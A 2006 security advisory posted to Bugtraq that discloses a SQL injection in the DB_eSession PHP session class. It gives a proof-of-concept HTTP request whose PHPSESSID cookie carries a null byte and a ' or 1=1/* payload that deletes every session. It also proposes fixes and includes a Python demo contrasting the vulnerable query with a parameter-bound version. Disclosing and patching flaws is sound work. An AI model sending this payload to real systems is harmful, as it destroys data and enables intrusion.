Message-ID: <43EE544F.2080203@gulftech.org>
Date: Sat, 11 Feb 2006 15:17:03 -0600
From: GulfTech Security Research <security@...ftech.org>
To: bugtraq@...urityfocus.com, Secunia Research <vuln@...unia.com>,
	moderators@...db.org
Subject: DB_eSession deleteSession() SQL injection


##########################################################
# GulfTech Security Research            February 11, 2006
##########################################################
# Vendor : Lawrence Osiris
# URL : http://www.phpclasses.org/browse/package/1624.html
# Version : DB_eSession 1.0.2
# Risk : SQL Injection
##########################################################


Description:
DB_eSession is a feature-packed PHP class that stores session
data in a MySQL database rather than in files. It is powerful,
designed with security in mind, and easy to use. The DB_eSession
library is used in a number of popular web applications and
private projects alike. DB_eSession is vulnerable to SQL
injection because data taken from a cookie is used unsanitized
in an SQL query, which allows an attacker to craft malicious SQL
queries and have them executed by the database.



SQL Injection:
There is an SQL injection vulnerability in DB_eSession that
allows an attacker to perform pre-authentication SQL injection
attacks against any web application built on the vulnerable class.

/**
* Try and save the current session ID if one is defined already.
*/
if (isSet($_COOKIE[$this->_sess_name]))
    $_sess_id_set = $_COOKIE[$this->_sess_name];
else
if (isSet($GLOBALS[$this->_sess_name]))
    $_sess_id_set = $GLOBALS[$this->_sess_name];
else
    $_sess_id_set = NULL;

The above code is from the DB_eSession class, lines 1080-1090.
The variable $this->_sess_name is in most cases PHPSESSID, or a
developer-specified value; you can tell which by looking at the
cookies the application sets.

GET /example/index.php HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=143263645564654563456345634563435%00' or 1=1/*

The above request would delete every session in the database.
The null byte is there to get past the check that would otherwise
make the application die at line 1134. Depending on the version
of MySQL in use, other attacks may be possible. The root of the
problem is that untrusted data is taken from a cookie value and
passed to the deleteSession() function, where it is used in an
SQL query without being escaped.



Solution:
The vendor was unresponsive to my contact attempts, but a fix is
not too difficult: at line 1092, directly below the code shown at
lines 1080-1090, add the following line

$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: addslashes($_sess_id_set);

This should stop the SQL injection attack described above against
the vulnerable DB_eSession class. Note that addslashes() knows
nothing about the connection's character set, so escaping with
mysql_real_escape_string() on the open MySQL connection, or better
still binding the session ID as a query parameter, is the more
robust fix.
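As an added worked example (not code from this advisory or from the
DB_eSession class itself): a Python/SQLite model of the deleteSession()
pattern described above, run against the cookie value from the request
shown earlier, beside a hardened version that validates the session ID
and binds it as a query parameter instead of relying on addslashes().
The table name sessions, its column names, the sample rows and the
session ID allowlist are constructed assumptions; the advisory does not
quote the class's actual DELETE statement.

```python
import re
import sqlite3

# Constructed sample: a few session rows standing in for the DB_eSession
# session table. Table and column names are assumptions made for this
# example; the advisory does not show the class's real DELETE statement.
SAMPLE_SESSIONS = [
    ("a1b2c3d4e5f60718", "user=alice"),
    ("0f1e2d3c4b5a6978", "user=bob"),
    ("deadbeefcafef00d", "user=carol"),
]

# Cookie value from the advisory's request, minus the %00 byte. The null
# byte only serves to get past a die() in the PHP class; it plays no part
# in the SQL itself (and Python's sqlite3 refuses statements containing NUL).
PAYLOAD = "143263645564654563456345634563435' or 1=1/*"

# Session IDs we are willing to hand to the database: an assumed, conservative
# allowlist of the characters PHP's default session ID generator emits.
SESSION_ID_RE = re.compile(r"\A[A-Za-z0-9,-]{16,128}\Z")


def is_valid_session_id(sess_id):
    """True only for strings shaped like a session ID. A NUL byte, a quote or
    a space is simply a disallowed character here, so the null-byte trick
    from the advisory does not help an attacker past this check."""
    return SESSION_ID_RE.match(sess_id) is not None


def fresh_db():
    """In-memory SQLite database seeded with the constructed sessions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (sess_id TEXT PRIMARY KEY, sess_data TEXT)")
    conn.executemany("INSERT INTO sessions VALUES (?, ?)", SAMPLE_SESSIONS)
    conn.commit()
    return conn


def count_sessions(conn):
    return conn.execute("SELECT COUNT(*) FROM sessions").fetchone()[0]


def delete_session_vulnerable(conn, sess_id):
    """The pattern the advisory describes: the cookie value is interpolated
    straight into the DELETE. Returns the number of rows removed."""
    sql = "DELETE FROM sessions WHERE sess_id='%s'" % sess_id
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def delete_session_hardened(conn, sess_id):
    """Hardened form: reject anything not shaped like a session ID, then bind
    the value as a parameter so it can never be parsed as SQL."""
    if not is_valid_session_id(sess_id):
        raise ValueError("malformed session id")
    cur = conn.execute("DELETE FROM sessions WHERE sess_id=?", (sess_id,))
    conn.commit()
    return cur.rowcount


def demo():
    """Run the advisory's payload through both versions. Returns
    (rows removed by the vulnerable version, rows removed by the hardened
    version, rows removed for a legitimate ID, rows left afterwards)."""
    conn = fresh_db()
    removed_vuln = delete_session_vulnerable(conn, PAYLOAD)  # every row goes
    conn.close()

    conn = fresh_db()
    try:
        removed_hard = delete_session_hardened(conn, PAYLOAD)
    except ValueError:
        removed_hard = 0  # payload never reached the database
    # A legitimate ID still works through the hardened path.
    removed_legit = delete_session_hardened(conn, "a1b2c3d4e5f60718")
    remaining = count_sessions(conn)
    conn.close()
    return removed_vuln, removed_hard, removed_legit, remaining


if __name__ == "__main__":
    print(demo())  # (3, 0, 1, 2)
```

The injected WHERE clause becomes sess_id='...' or 1=1 followed by an
unterminated /* comment that swallows the trailing quote, which is why
the vulnerable version empties the table. Note that SQLite does not treat
a backslash as an escape character, so an addslashes()-style fix would
not even help in this model; parameter binding works regardless of the
database engine or connection character set.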



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00099-02112006

